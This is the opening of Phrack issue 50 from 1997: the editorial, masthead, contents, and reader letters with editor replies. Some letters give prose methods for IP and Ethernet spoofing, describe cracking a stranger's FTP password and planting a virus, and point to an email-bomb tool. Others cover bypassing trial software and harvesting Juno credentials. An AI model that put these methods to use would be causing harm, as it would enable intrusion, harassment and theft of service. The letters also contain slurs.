.oO Phrack 50 Oo.
Volume Seven, Issue Fifty
1 of 16
Issue 50 Index
____________________
P H R A C K 5 0
April 09, 1997
____________________
"The Perfect Drug"
START the fireworks...
ALERT the mass media...
CUE up the Axel-F Beverley Hills Cop music...
AND FOR THE LOVE OF GOD, SOMEONE NOTIFY MITCH KABAY...!
Phrack 50 is here.
To celebrate this landmark event, for a limited time, we are offering *all*
Phrack issues (including this one) at a special "WE-MUST-BE-OUT-OF-OUR-MINDS"
rate of HALF-PRICE!! That's right! Now you can enjoy Phrack for 50% off
the standard price of free! Now you can enjoy your favorite electronic
zine and still have enough money left over to get those breast implants!
It seems, in recent months, the mass media has finally caught onto what we
have known all along, computer security _IS_ in fact important. Barely a
week goes by that a new vulnerability of some sort doesn't pop up on CNN.
But the one thing people still don't seem to fathom is that _WE_ are the
ones that care about security the most... We aren't the ones that the
corporations and governments should worry about... We are not the enemy.
Phrack is often described by the mass media as an 'Underground Hacker's Zine'
run by `irresponsible` youths. Compare Phrack's distribution with that of
the security publications that charge just enough money to keep students
and interested outsiders from reading it... Then decide who is
`irresponsible`. Phrack is often criticized by professionals as giving away
tools to people who aren't responsible enough to use them. The fact is, we
are giving away tools to people who aren't rich enough to buy them.
The parallels between Internet packet sniffing and phone wire tapping are
enormous. The abuses of wire tapping by government agencies are well
documented. Not so well documented, however, are similar abuses by these same
agencies across key Internet access points. This is just another classic
example of the Government trying to assert complete control. The Internet is,
however, anarchistic by nature and dynamic by design. It resists all attempts
at governing and all attempts at control.
By providing a public compendium of the same knowledge, information and
resources that all the money in the world can buy, we help ensure that the
Internet will remain safe with the individual. Knowledge is not power.
Knowledge is _empowerment_.
This issue contains a great deal of C source code. Somewhere in the
neighborhood of 5000 lines of C source. To facilitate painless extraction
of the code and support files into an arbitrarily designated hierarchical
directory structure and still maintaining readability while in `zine`
format, we developed a custom extraction utility. (Good lord that was a
long sentence...) Article 16 contains the source for extract.c, instructions
for compilation and use can be found therein.
---------------------------------------------------------------------------
Enjoy the magazine. It is for and by the hacking community. Period.
Editors : daemon9[route], Datastream Cowboy
Asst. Editor : Alhambra (appears courtesy of the guild corp.)
On ice : Voyager
Mailboy : Erik Bloodaxe
News : Alhambra, disorder
Elite : snocrash
Best Coast : Left Coast
Fatstar : loadammo
Thinstar : nirva
SPOOOOOOOOON! : sirsyko
Rocks the Fucking House : 16 Volt
Bad at pool : the NSA
Tip o' the black hat : omerta
Birthday Boy : loki
GET A LIFE : All you jennicam losers. (jennicam.simplenet.com)
Shout outs / Thank yous : mudge (cos he just plain rules), the Guild and
r00t, pyro, blaboo, o0, halflife, nihil (for
dealing with my daily whining, working 6848 hours
a week, and *still* providing the kickass article),
alhambra (for coming through in a big way for Phrack
when other people let us down), mycroft (fruitbat),
Juliet (cookies)
Phrack Magazine V. 7, #50, April 09, 1997.
Contents Copyright (c) 1996/7 Phrack Magazine. All Rights Reserved. Nothing
may be reproduced in whole or in part without written permission from the
editors. Phrack Magazine is made available quarterly to the public, free of
charge. Go nuts people.
Subscription requests, articles, comments, whatever should be directed to:
phrackedit@infonexus.com
Submissions to the above email address may be encrypted with the following
key (note this is a REALLY NEW key, we promise not to lose it this time):
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2
mQENAzMgU6YAAAEH/1/Kc1KrcUIyL5RBEVeD82JM9skWn60HBzy25FvR6QRYF8uW
ibPDuf3ecgGezQHM0/bDuQfxeOXDihqXQNZzXf02RuS/Au0yiILKqGGfqxxP88/O
vgEDrxu4vKpHBMYTE/Gh6u8QtcqfPYkrfFzJADzPEnPI7zw7ACAnXM5F+8+elt2j
0njg68iA8ms7W5f0AOcRXEXfCznxVTk470JAIsx76+2aPs9mpIFOB2f8u7xPKg+W
DDJ2wTS1vXzPsmsGJt1UypmitKBQYvJrrsLtTQ9FRavflvCpCWKiwCGIngIKt3yG
/v/uQb3qagZ3kiYr3nUJ+ULklSwej+lrReIdqYEABRG0D1BocmFjayBNYWdhemlu
ZQ==
=sdwc
-----END PGP PUBLIC KEY BLOCK-----
ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED
Phrack goes out plaintext... You certainly can subscribe in plaintext
.oO Phrack 50 Oo.
-------------------------------------
Table Of Contents
1. Introduction ... Phrack Staff 9K
2. Phrack Loopback ... Phrack Staff 60K
3. Line Noise ... various 72K
4. Phrack Prophile on Aleph1 ... Phrack Staff 7K
5. Linux TTY hijacking ... halflife 15K
6. Juggernaut ... route 123K
7. SNMP insecurities ... Alhambra 20K
8. Cracking NT Passwords ... Nihil 17K
9. SS7 Diverter plans ... Mastermind 27K
10. Skytel Paging and Voicemail ... pbxPhreak 36K
11. Hardwire Interfacing under Linux ... Professor 11K
12. PC Application Level Security ... Sideshow Bob 21K
13. DTMF signalling and decoding ... Mr. Blue 17K
14. DCO Operating System ... mrnobody 16K
15. Phrack World News ... Alhambra 110K
16. extract.c ... Phrack Staff 2K
523k
-------------------------------------
Every article in Phrack is written free of charge, for and by the hacking
community. If you are a hack, phreak, student, professor, professional,
or even a loser with an idea and you have some knowledge or information
you would like to empart, there are thousands of readers who would love
nothing more than to learn from you. If you want to submit something
anonymously, it will stay anonymous, if you want attributation, feel free to
use your real name or a psuedonym. The deadline for submissions to Phrack 51 is
July 25th, 1997, but the earlier the better. If you are planning on writing an
article we'd like to hear from you as soon as possible.
If you don't think you are going to be able to write an article, but you have
some comments about Phrack, commentary about the hacking world, funny stories,
exploits, news items, or just want to tell us about the government site you
just hacked (PGP'd and through an anonymous remailer PLEASE), we love getting
mail. PGP key and e-mail address are above.
-------------------------------------
" *pyro* phrack is my faith and the e-zine is my bible, you are one of my
high priests! "
- Some IRC zealot
" ...r00t and the guild.... Like peanut-butter and jelly -- you could have
one without the other, but *why* would you want to...? "
- route
EOF
.oO Phrack 50 Oo.
Volume Seven, Issue Fifty
2 of 16
Phrack Loopback
-----------------------------------------------------------------------------
Hi,
I have a story of violations of freespeech and censorship and
if I am busted unjustly, please publish this story to the public.
Yesterday some faggot e-mailed me with a ton of ascii crap that
took me an hour + to DL. WHen I finished DLing it, windoze stalled and I
had to restart.. So naturally I was pissed off. The reason this guy
said he did this was because I posted a cheat program for the game
Diablo on my webpage and he doesn't like cheaters. Today he e-mailed me
again with ascii crap.....I was beyond pissed....so I did what anyone in
my position would do....Imailbombed him ... about 600 msg's or so.
I used Kaboom3 and an SMTP I thought (Looked like it from port 25) was
anonymous and untraceable.
As it turns out, 2 hours later the head of security at Earthlink
(my current ISP) called and said that someone from my account had e-mail
bombed this person. The security guy said that the person I bombed
complained to his ISP because it "put out his business for hours." His
ISP traced it to Earthlink and then to me, by contacting the earthlink
security guy and having him look in the logs for who was connected to
the ip (dynamic) they saw in the bomb messages at the time the bombing
occurred. He also said that the guy I bombed called the FBI and got them
involved in it. Is this sounding fucking ridiculous yet? First of all,
any reputable business presumably has a better-than-28.8 connection,
which means it would have taken this guy a couple seconds to DL my bomb.
Secondly, even if he doesn't have a T-1, at 28.8 it would take 2 hours
or so, maybe less. But the FBI is involved..... I can't fucking
believe it! So naturally the first thing I do is e-mail all the
reputable hackz known to me. This is ridiculous, this is
oppressive, this is BIG BROTHER!
Yours,
GrEeNbEaSt
[ So, what exactly is it that you want us to do, besides burst into fits
of uncontrollable for several minutes at a time? ]
-----------------------------------------------------------------------------
Hey, in phrack 48, the article on IP spoofing says you need to sample to
TCP sequence numbers of the host you are attacking. The method is
suggests is to connect via SMTP and then drop the connection. There is
a problem with this - sendmail usually logs failed mail transfers, so
the host will probably be able to correlate this with the time of the
attack and find out who you are. Further, this connection must be done
from a non-spoofed IP address to guarantee you get a returned packet.
There are two options available here:
1) Forge the sequence sampling connection as another host on your subnet
(although if they contact your provider and your provider logs massive
data, you're busted - also this will not work if the local network uses
an active hub)
2) Make sure to remove these traces if you manage to crack the machine -
this is all or nothing - if you fail to crack it, but left indicators of
an attack, you are screwed. (again only if your provider logs heavily)
If you want to circumvent these dangers altogether, simply sample the
sequence numbers from some highly non-logging port. The standard inetd
server for UNIX runs a TCP echo, discard and chargen service, which you
can get sequence numbers from, and does not log anything.
There are two complications to this attack which are becoming
increasingly used, and which effectively prevent it.
1) Some providers do not allow foreign IP addresses to go out of their
subnet as source IP addresses - this is done through router blocking.
Most sites just don't give a damn or are too stupid to figure out how to
do it, but the number of providers doing this is increasing. You could
try to hack their router - easy to find, do a traceroute, but chances of
success are slim if it doesn't allow remote logins. Also, your ISP will
know if this happens, and may take additional precautions immediately
(such as grabbing your ethernet address if you are on a local network -
then you are f!!ked) We don't want any minors reading this to see any
offensive words, do we - oh lord, they might even ban phrack in the
state of Texas. No offense to anyone from Tx unless they deserve it.
2) Some OS's use pseudo-random number generators to create TCP sequence
numbers at the beginning of each connection. This is easy to do under
Linux, and I think some commercial OS's might even be doing this now
(anyone have confirmation of the rumor that Solaris now does this?)
Now, this is easy to check for - connect twice in immediate succession
and see if you get two sequential (or close) numbers. However, a
workaround for this would be to generate pseudo-random sequence numbers
for the first connection from a given IP address (and then again when
the IP layer no longer has any knowledge of this IP address) If a site
was running non-crypto pseudo-random sequences, it would be possible to
analyze it using a spectral test to try to predict sequence numbers, but
if they use a cryptographically secure sequence generator, you would
have to break it (probably not too hard since any highly secure crypto
sequence would make IP response time unreasonably slow) A
counter-solution to this would be to generate random numbers in low cpu
load time, and have a buffer of them for later use. Here, we could
probably go on forever with attacks and countermeasures, so lets stop
now, as a cure for sanity.
As an aside note for the highly paranoid: ethernet spoofing
Note: some of this is theorized, and might not be 100% accurate - if you
get the jist of it, you should be able to figure out if it works for
you.
It is possible to spoof ethernet hardware addresses as well. Some cards
will allow you to do this easily, but you need to have card programming
docs (check the Linux kernel source for your card driver-!!). Others
won't let you do it at all, and require a ROM change, or worse it might
be solid state logic on the card - EVIL. Course you might be able to
get around solid state stuff by recoding the ROM, but I wouldn't
recommend it unless you don't have the $70 to buy a new card, and have a
month or two to spend in the basement.
If you make up an ethernet address, you should probably use a real card
identifier (the first three bytes). This is because some sniffing
software raises warning flags when unknown card identifiers pop up, and
this software is run by more network admins than I'd like to think.
Some new hub technologies may limit this type of spoofing- most notably,
active hubs wouldn't allow it at all. Other new hub designs use
mappings of ethernet address to specific ports on the hub, so you might
not be able to change the address without turning off the machine,
waiting for the hub to time out the address, and rebooting.
Ethernet hardware address spoofing will make a machine completely
undetectable, provided it is not the only machine on a network that is
being monitored.
There may be a way around active hubs, and this is multicast ethernet
addresses. Any network card capable of multicast should be able to send
packets with an ethernet multicast address. This address is not
specific to each card, as many cards can send and receive on the same
multicast address. The problem here is router and hub technology may
have already advanced to the point where it can distinguish multicast
ethernet addresses and convert them to multicast IP addresses, which
would not allow you to spoof. This is only theoretical - I haven't
tried it, don't know anyone who has, and have never even heard rumors
about it.
Note : this information is in no means comprehensive - I don't have the
time or resources to study it, but most likely results in ethernet
spoofing vary by the manufacturers of the network hardware all the way
down the local line - (i.e - ethernet card all the way to the first
gateway)
Another aside: return path rerouting
In return path rerouting, the IP spoofing attack follows the same
general principal, except that the attacking machine gets reply packets,
and does not need to operate blind. There are three ways to make this
work:
1) Pretending to be a trusted host on your subnet
Easy, just pick up packets destined for the trusted machine which
look like responses to your forged packets, and send on their IP
address, and SYN flood their machine. This will even work past
blocking ISP's
2) Source routing attack
Medium difficulty, you have to construct a path between your machine
and the target, and a path between your machine and the trusted host
(although the last part can be made up). Use this and either the
strict or loose IP routing option, and all packets will come back to=20
you. This will not work nearly as much, since many hosts and=20
routers discard source routed packets (it is a well-known flaw in=20
TCP/IP now). However, mightn't buggy implementations only discard
one type of source routing?
3) Experimental - ICMP redirect attack
Try using ICMP redirects to redirect the packets back to the=20
attacking machine. ICMP redirects should only be accepted to=20
machines on a local subnet, but buggy implementations might not do
this correctly (actually, I think the Host Requirements RFC says=20
this is recommended, not required). Also, it may be possible to =20
create a path using redirects or forged routing updates to direct
traffic to a trusted site back to the attacking site. After the
attack, the routing information could be repaired, making it seem
like a temporary network failure. If anyone followed this and knows
what I mean, let me know if you think it's possible. =20
Thanks
Zach
[ Zach, you have good ideas and points. Now, why haven't YOU written
an article for Phrack???
You should... ]
-----------------------------------------------------------------------------
DEATH TO THE INNOCENT
I WENT TO A PARTY, MOM, I REMBERED WHAT YOU SAID.
YOU TOLD ME NOT TO DRINK, MOM, SO I DRANK SODA INSTEAD.
I REALLY FELT PROUD INSIDE, MOM, THE WAY YOU SAID I WOULD.
I DIDN'T DRINK AND DRIVE, MOM, THOUGH THE OTHERS SAID I SHOULD.
I KNOW I DID THE RIGHT THING, MOM, I KNOW YOUR ALWAYS RIGHT.
NOW THE PARTY IS ENDING, MOM, AS EVERONE IS DRIVING OUT OF SIGHT.
AS I GOT INTO MY CAR, MOM, I KNEW I'D GET HOME IN ONE PIECE.
BECAUSE OF THE WAY YOU RAISED ME, SO RESPONSIBLE AND SWEET.
I STARTED DRIVING AWAY, MOM, BUT AS I PULLED INTO THE ROAD,
THE OTHER CAR DIDN'T SEE ME, MOM, AND HIT ME LIKE A LOAD.
AS I LAY HERE ON THE PAVEMENT, MOM, I HEAR THE POLICE MAN SAY,
THE OTHER GUY IS DRUNK, MOM, AND NOW I'M THE ONE WHO WILL PAY.
I'M LYING HERE DYING. MOM, I WISH YOU'D GET HERE SOON.
HOW COULD THIS HAPPEN TO ME, MOM? MY LIFE JUST BURST LIKE A BALLOON.
THERE IS BLOOD ALL AROUND ME, MOM, AND MOST OF IT IS MINE.
I HEAR THE MEDIC SAY, MOM, I'LL DIE IN A SHORT TIME.
I JUST WANTED TO TELL YOU, MOM, I SWEAR I DIDN'T DRINK.
IT WAS THE OTHERS, MOM. THE OTHERS DID NOT THINK.
HE WAS PROBIBLY AT THE SAME PARTY AS I.
THE ONLY DIFFERENCE IS, HE DRANK AND I WILL DIE.
WHY DO PEOPLE DRINK, MOM? IT CAN RUIN YOUR HOLE LIFE.
I'M FEELING SHARP PAINS NOW. PAINS JUST LIKE A KNIFE.
THE GUY WHO HIT ME IS WALKING, MOM, AND I DON'T THINK IT'S FAIR.
I'M LYING HERE DYING AND ALL HE CAN DO IS STARE.
TELL MY BROTHER NOT TO CRY MOM, TELL DADDY TO BE BRAVE.
AND WHEN I GO TO HEAVEN, MOM, PUT DADDY'S GIRL ON MY GRAVE.
SOMEONE SHOUYLD HAVE TOLD HIM, MOM, NOT TO DRINK AND DRIVE.
IF ONLY THEY HAD TOLD HIM, MOM, I WOULD STILL BE ALIVE.
MY BREATH IS GETTING SHORTER, MOM. I'M BECOMING VERY SCARED.
PLEASE DON'T CRY FOR ME, MOM, WHEN I NEEDED YOU, YOU WERE ALWAYS THERE.
I HAVE ONE LAST QUESTION, MOM, BEFORE I SAY GOODBYE.
I DIDN'T DRINK AND DRIVE, MOM, SO WHY AM I THE ONE TO DIE?
[ Interesting...booze, violence. Now, if only this little story had
some forced sodomy of teenage schoolgirls...
Man, I have no shame...drinking and driving is evil, and will get you
shot in Central America for attempted homicide. That's why I take
cabs or hang around with 12-steppers or mormons. Either way, it gives
you someone to subject to your drunken ravings.
Now why this was sent to Phrack, I have no idea. ]
-----------------------------------------------------------------------------
I just have one question, i just moved back down to Texas from NY,,,
is there any one at phrack that knows local BBS numbers for san antonio???
thanx for the help,
[In almost any city with running water and electricity (and yes,
even San Antonio qualifies as of this writing), in any local computer
store you will find local compu-nerd publications. I think in San Antonio
its "Computer User." In any case, in the back are usually listings of
local bulletin boards. Start with these, and eventually you will come
across the kinds of bulletin boards you really want. ]
-----------------------------------------------------------------------------
The trial of the Danes arrested in the article I wrote in #47 has now
ended. No jail sentences, just community service up to 200 hours (me)
and a fine of 30.000Dkr. (apx. $5000).
Anyway, remember I wrote you about the article being quoted and
translated to Danish in a Danish magazine? Well, after the same magazine
published our REAL names, adrs with the advice not to hire us for any
jobs I got pretty sick of them and sent them a bill of DKr 5000, billing
them for my article.=20
Of course, they won't pay me (would rather go to court) so now I'm
considering taking them on their word. The company I'd be going after
is a daughtercompany of Coopers & Lybrand and is called Institute of
Datasecurity. Most of their employees seem to be notorious idiots, always
proclaiming themselves in the media with the anecdotes of yesterday. They
even gave out an award (money) to the DA who prosecuted us for doing
a nice job!=20
Well, since they didn't only violate my personal copyright but also the
restrictions of Phrack Magazine itself, I wanted to know if I could get
your support? Just some kind of written statement about the policy of
the magazine, whether or not they paid you for it, etc.
In a hurry, dont mind the mistakes,
Le Cerveau
[ Can you please send a photocopy of that article to us at the Phrack
mailing address? Maybe we can help.
I really don't have much respect for the accounting firms "computer
security" teams, and never have. In the years they've been doing this
work, they STILL don't get it.
It's too bad you aren't in America. You could probably sue the living=
hell
out of everyone involved, if they really did publish your names
and advise people not to hire you for work. ]
-----------------------------------------------------------------------------
HEY Whats up,
I was wondering if U could tell me how to e-mail bomb Please!!!!=20
[No, that's a stupid thing to do.
But, if you insist....
Go do a WWW search for the program "UpYours" This should
suit your needs just fine. ]
-----------------------------------------------------------------------------
Hello,
I was wondering if you know where i can get copies of "The Journal of
Privileged Information"? I have issues 1-5, and i`m looking for 6 -
present. If you know where i can get them, it would be greatly
appriciated!! thanx
techcode
[ I'm not really familiar with this magazine, but if anyone out there
has copies of this, email us with information on where to get more. ]
-----------------------------------------------------------------------------
Dear Phrack,
Great job on issue 49. I enjoyed the section in Line Noise about ID
machine hacking. Anyway, I wanted to say that Phrack rules; it is by
far my favorite computer hobbyist magazine. By the way, I remember reading=
a
letter that a reader sent in, about some queer selling bound volumes of=
Phrack,
LOD Tech Journals, and virus source code. A similar occurance happended to
me when I found that some wannabe-elite pseudo-hacker was selling printed
copies of Phrack, 40 Hex, Digital Free Press, and Xeroxed copies of=
alt.2600.
I was curious, to say the least, and felt compelled to defend the honor of
those aforementioned publications. I talked to the fag, and I gained his
trust by using undecipherable hacker jargon that he seemed awed by. It=
turns
out that he had been distributing pirated junk on his PC, using an=
unregistered
copy of Serv-U. I gave him a registration crack, and in return he gave me=
an
account on his machine, so I could download his warez. I logged on to
his PC one day, and I quickly found the serv-u.ini file with the encrypted
passwords.
Since Serv-U uses Unix style encryption, I cracked his personal account
in about 17 minutes. He kept a TCP/IP connection open from 4pm to 11pm
every evening, and I logged on as him one day. I uploaded a virus to the
windows system directory and renamed it something benign, and then I edited
his autoexec.bat to execute it (I also used Fixtime from the Nowhere
Utilities 2.0 to make it smooth). I haven't heard from him since. That
one was a simple job to protect the rights of cool magazines like Phrack!
Take it easy, and keep the issues coming.
dethbug
[ If only all readers were as loyal. Or better yet, if only all readers
sent us a dollar!
Seriously though...a virus was a bit much, but since we weren't there
to sue to protect our copyright...
But uh, let it be known that you were not directed by, nor acting as an
agent of Phrack Magazine, and any and all such behavior was done
purely on your own behalf. :) ]
-----------------------------------------------------------------------------
Does this cost anything ?=20
LORDCYBRON
[ Unfortunately it does, but only your mortal soul. ]
-----------------------------------------------------------------------------
Phrack,
We would like permission to republished Chris Goggans'
(Erik Bloodaxe) editorials from issue 4.42 to issue
7.48 in Node9: An E-Journal of Writing and Technology.
http://node9.phil3.uni-freiburg.de
There is a lot of interest in hacker culture in
cultural studies, and Chris Goggans' editorials give
a good snapshot of the hacker's side of the from
last three years.=20
We could tell our readers to simply go to Phrack and get
the editorials themselves, but putting the editorials
together makes them more effective. Plus, for many of
our readers, a number of names, terms, events need to
be annotated.
Jon Adams=20
[ Well Jon, Phrack has always had a policy of letting people reprint
articles / editorials / whatever as long as all pieces remain
intact with all credit given to the original author and to Phrack
Magazine. If you can do that, feel free to use the editorials. ]
-----------------------------------------------------------------------------
Hi Hackers
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
I have only one question for you, please answer me. I read in your magazine
> =3D=3DPhrack Magazine=3D=3D
>
> Volume Seven, Issue Forty-Eight, File 10 of 18
>
> Electronic Telephone Cards: How to make your own!
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Its very excelent for people who live in country when used the cards from=20
Gemplus, Solaic, Schlumberger, Oberthur: (French cards 256 bit). But I live=
in=20
Slovak Republic and in this country we use The cards from ODS, Giesecke &=20
Devrient, ORGA Karten systeme, Uniqua, Gemplus, Schlumberger and Oldenbourg=
=20
Kartensysteme (German cards 128 bit).
I am was reading in some paper that some people have emulator of these=20
telephone cards (German card). Emulator with PIC procesor.
But I very very long time searching Internet and I have not information how=
=20
I make this emulator. Only in your magazine I found help how I make=20
emulator but emulator which emulate french telephone card but I need=20
emulator which emulate german telephone card.
Please help me if You know some adress where I can find information=20
HOW I MAKE TELEPHONE CARD EMULATOR (WITH PIC PROCESSOR) WHICH EMULATE=20
TELEPHONE CARD TYPE GERMAN TELEPHONE CARD (128 BITS).
Thanks very much, for your answer. realllly thanks, i am waiiiiting.
!!!!! M A X O !!!!!
[ Actually, we don't but perhaps this request will bring in some
information from people in Germany. ]
-----------------------------------------------------------------------------
Can you please send me some hacker stuff that I can use on AOL.
THANX
[ The most important tool a hacker can have is a brain. Unfortunately,
since you are on AOL, it appears that your tool box is empty. Perhaps
you'd be more interested in some cool beavis & butthead .WAV files... ]
----------------------------------------------------------------
Looking for talented hackers for special projects.
First project concerns breaking source code. Please respond.
Justin Raprager=20
[ You probably can't afford any of us on the Phrack Staff.
Your request is being passed on the the readers. ]
-----------------------------------------------------------------------------
Is your web site the best kept secret on the Internet?
We'll promote it to 50 search engines and indexes for $85
and complete the job in 2 business days. Satisfaction is
guaranteed!
Owl's Eye Productions, Inc.
260 E. Main Street
Brewster, NY 10509
Phone: (914) 278-4933
Fax: (914) 278-4507
Email: owl@owlsnest.com
[ Now, if our site is a secret, then how did you morons know about us?
I think a better sales pitch is:
"Is your Web Site Secure?"
We'll give your info to several million hackers for FREE who will be
sure to subject it to an extesive battery of security testing ranging
from exploitation of remote security vulnerabilties to denial of service
attacks. Your site will be profiled continuously for months until
people grow tired of causing you grief.
Would Owl's Eye Productions, Inc. care to be the first for this
amazing new service? Let us know. ]
-----------------------------------------------------------------------------
From: Ray Wardell
To: phrack@well.com
Subject: FUCK YOU
FUCK YOU ... YOU DUMB ASS SHIT HEAD... FUCK WITH ME AND DIE...
[ Uh, ok. ]
-----------------------------------------------------------------------------
Hi, I would like to become a hacker. I just watched that movie HACKERS. It
got me all siked up. If you could give me some information on how to
become one, I would be apreciative.
[ So if you had watched "Buttman Goes To Budapest" then Stagliano would
be getting this email instead of Phrack?
Dude...it was only a movie. And a bad one at that. ]
-----------------------------------------------------------------------------
Hi there !
Your article of the PIC16C84-Phonecard includes a uuencoded part
that contains the file "telecard.zip". telecard.zip contains the file
telecard.pcb which was created with Tango PCB Series 2.
My version of Accel Tango PCB Version 12 is not able to read this file.
So, I want to ask you, if its possible to send me this file in ASCII-Format
or (better) in a graphic-format like PCX or GIF.
A HP-Laserjet-prn-viewer would be useful, too.
I was also not able to read the schematic-file. Maybe you know a
location on the internet where I can get an evaluation version of the
older version of Tango PCB Series II.
[ Actually, we've got the same problem here at Phrack. Anyone out there
who can help, please send us email and we'll get it out to the
masses! ]
-----------------------------------------------------------------------------
Hi my name is Konrad. I live in Ottawa, Onratio (Canada). I have a
question about one thing. When I download a trial program from internet,
it is only good for 30 days, and when it expires it writes that, to some
file so I tried reinsalling and redownloading the program, but when I
tried to run it, it gave me a message that this version is expired and
that I have to purchase the program. Do you know, to what file it
registers that it has expired, and how to disable it. If you don't know
how to do it, maybe you know someone that might be able to do it, and
forward my address to them. It is very important to me, because I'm
finishing a home page called Teen Online and my graphic program expired
(TrueSpace2) and there is no way that I can afford it, so I rather stick
to trial version. Ok... Thanks for your time.=20
Konrad
[ Usually you can simply reinstall these trial programs and use them
for another 30 days. With others, you can change your system date
back, or edit a date in an INI file. It all depends on the program.
Try some of these things and let us know what works. ]
-----------------------------------------------------------------------------
Why don't you write somthing for the bulgarian hackers?
(recent:take a look at everything that happened in Varna, Bulgaria this=
year)
M a n i a X K i l l e r i a n
[ We'd love to print something about the Bulgarian scene. Honestly,
I have no idea what happened in Varna, nor would I know where to look.
Here's a novel idea: Since you are IN Bulgaria, why don't you
write something about it for us! ]
-----------------------------------------------------------------------------
I'm using BPI Accounts Receviable System Version 1.10 for IBM
Released September 1983
It has whats called a "key disk" that allows only the person with that
disk to closeout the program or month. The problem is this, when I make
a copy of this Key Disk the files match the original to the T.. There are
only 2 files involved. But, when I try to closeout, BPI asks me to insert
the Key Disk and press enter to proceed. When I do this with the "copy"
of the Key Disk the BPI program tells me that the copy is not a Key Disk.
This only happens with the copy, any ideas?=20
Both Key Disks contain the same information. If I try to activate the
close directly from the Key Disk Copy it tells me that it can't find a
file, basrun.exe I checked and this file is part of the BPI Directory on C:
I've used this accounting software for many years and it works well.
But I'm afraid the good Key Disk may go bad one day and I'll be stuck.
Thats why I'm trying to make a copy. Any help would be appreciated.
[ Obviously there is something else on that disk that a normal copy
is not getting. Maybe something as simple as a volume label or
some hidden files.
The easiest thing to do to get around this is make a sector by sector copy
to a disk image file using some kind of program like the UNIX command "dd"
and then copy that image back onto a blank diskette. ]
-----------------------------------------------------------------------------
Hi!
Here I have something for you, which may be interesting in your news=
section.
Sometime during the night between Saturday April 5th and Sunday April 6th,
hackers broke into one of Telenor Nextel's webservers and deleted the=
homepages
of 11.000 private customers and 70 corporate customers, among them the=
homepages
of Norway's two largest newpapers VG and Dagbladet, and the largest online=
news
magazine, Nettavisen.
The hackers somehow got access to hidden scripts, and after modifying and
manipulating them ran them, thereby deleting all the files mentioned.
Early Sunday, the ISP Telenor Nextel started restoring files from a backup=
made
Saturday, but after encountering problems with that one, they had to restore
from Tuesday's backup. Saturday's backup will be added sometime during=
Monday.
=D8kokrim, Norwegian police's department for Economic Crime has been=
contacted.
=09
Reactions:
Sverre Holm of Norway's Organization for Internet Users (http://www.ibio.no)
criticize Telenor for lack of proper information, as well as an unhealthy
attitude. In response to Telenor's comment that they can't guarantee this=
won't
happen again, he says, "Such an attitude can't be tolerated. If this is what
Telenor means, then we have a serious problem here."
Other reactions will surely come in the next days.
References (all in Norwegian):
Telenor Internett:
http://internett.telenor.no/
Scandinavia Online:
http://www.sol.no/ (Telenor's online service)
SOL Direkte:
http://www.sol.no/snpub/SNDirekte/index.cgi?kategori=3DNett-Nytt
Nettavisen:
http://www.nettavisen.no/Innenriks/860330846.html
I hope this could be interesting to you, and a candidate for your news flash
pages. Unfortunately, any references included are to pages in Norwegian, but
anyone with you speaking either Norwegian, Swedish, or Danish should be able=
to
get more information.
Cheers,
O L I K
[ We here at Phrack always want to know what is going on out there on
planet Earth. Keep us informed of anty other developments! ]
-----------------------------------------------------------------------------
I'm investigating some informatic viruses who infect images generating
new fractalized images with a never seen beauty and singularity. Or may=20
be they investigate me. These viruses could broke sohemer in many diverse=20
disciplines like art, artificial life, fractals maths, digital image..=20
if you look web's images http://antaviana.com/virus/angles.htm you will=20
understand everything. I would be acknowledged if you could help me, and=20
it is posible i would like you to diffusse this subject in your interesting
publication.
In the name of biodiversity, if you have these VIRUSES,
PLEASE DON'T DISTROY THEM.
[ Ok. We won't. ]
-----------------------------------------------------------------------------
Hi !
I read In Volume Seven, Issue Forty-Eight, File 11 of 18 - How to make own
telephon card . But when i try to make it , this card didnt work ! I try
all things, and i try to find more informations about telephone cards, but
i still dont know what's wrong !
But today i found on http://www.hut.fi/~then/electronics/smartcards.html
that there is some errors, but there is no information what's wrong.=20
So i decidet to write to Phrack magazine , becouse in article is eriten to
mail all questions to Phrack....=20
Please send me info what is wrong, and how i must change the ASM program to
work correctly or just PLEASE send me email of contact person who knows how
to !!
Thanx in advance !
Marko
[ Obviously that little smartcard article caused a stir. We've got all=
kinds
of email about it. We'll see what more we can dig up, but we are going
to really need some help from Europeans and South Americans. (Smart
cards are not in use here in America!) ]
-----------------------------------------------------------------------------
LOA is back!!! Visit our new page at:
http://www.hackers.com/LOA
Check it out and be sure to send your comments to revelation@hackers.com
Volume 2 of The Ultimate Beginner's Guide To Hacking And Phreaking has been
released as well, so be sure to download it and send me your comments. Be
sure to check out the LOA Files section to view and download past, present,
and future LOA Projects. Take it easy all...
[ No offense intended, but did you ever wonder why there were so many
"Legions of" whatever after LOD?
We'll put a link up to your page though... ]
-----------------------------------------------------------------------------
Hey, did you know that Juno (the nationwide free email service) has PPP
access? Free? To superusers only? Who login directly to their terminals
that have no ANI? And that they are complete fucking idiots, because in
every juno.ini file buried deep in the /juno/user00000x/ directory there is
a section called "Variables" which lists at least one Juno server account,
i.e. "junox14" and a password for it. These work. Not that I've tried them,
or do this, or can be held in any way legally responsible for my non-PGP
encrypted actions, which do not show my views, and are protected under the
1st Amendment.
Sorry, didn't feel like using alternate caps today.
l8r,
-dArkl0rd-
[ Interesting. We'll have to get the Juno software and play
without the advertisements!
Thanks, Mr. Shaw ]
-----------------------------------------------------------------------------
Hi. I've got a strange request. We're putting together a case that
encourages the U.S. to loosen its encryption export policies.
Do you know of any written resources that discuss the ability of hackers
to break into NASA, tamper with launches or satellites? The folks at
infowar.com insist that it is possible, but say that confidentiality
won't allow them to publish that fact.
We need written evidence to document the case, you understand.
Anyway, I'd appreciate hearing from you.
Jonathan
[ I'd suggest you talk to Emmanuel Goldstein at 2600. The whole
satellite thing came from a bogus post back in the early 80's
on a BBS in New Jersey called "The Private Sector." Reporters
siezed on it, resulting in headlines like "Wiz Kids Zap Satellites."
2600 wrote about this in I believe 1984 or 1985. Check with them for
better details. ]
-----------------------------------------------------------------------------
Queridos crackeadores:
Les quiero pedir si no saben de donde puedo sacar programas para
crackear y phrackear.
=20
Desde ya mucahas gracias:
Mauricio
[ Existan muchos programas en sitos de FTP y WWW en todos los piases
del mundo. No sabes de donde puedes sacarlos? Compredes
"Webcrawler" o "Excite"? Dios mio. ]
-----------------------------------------------------------------------------
Hi Phrack;
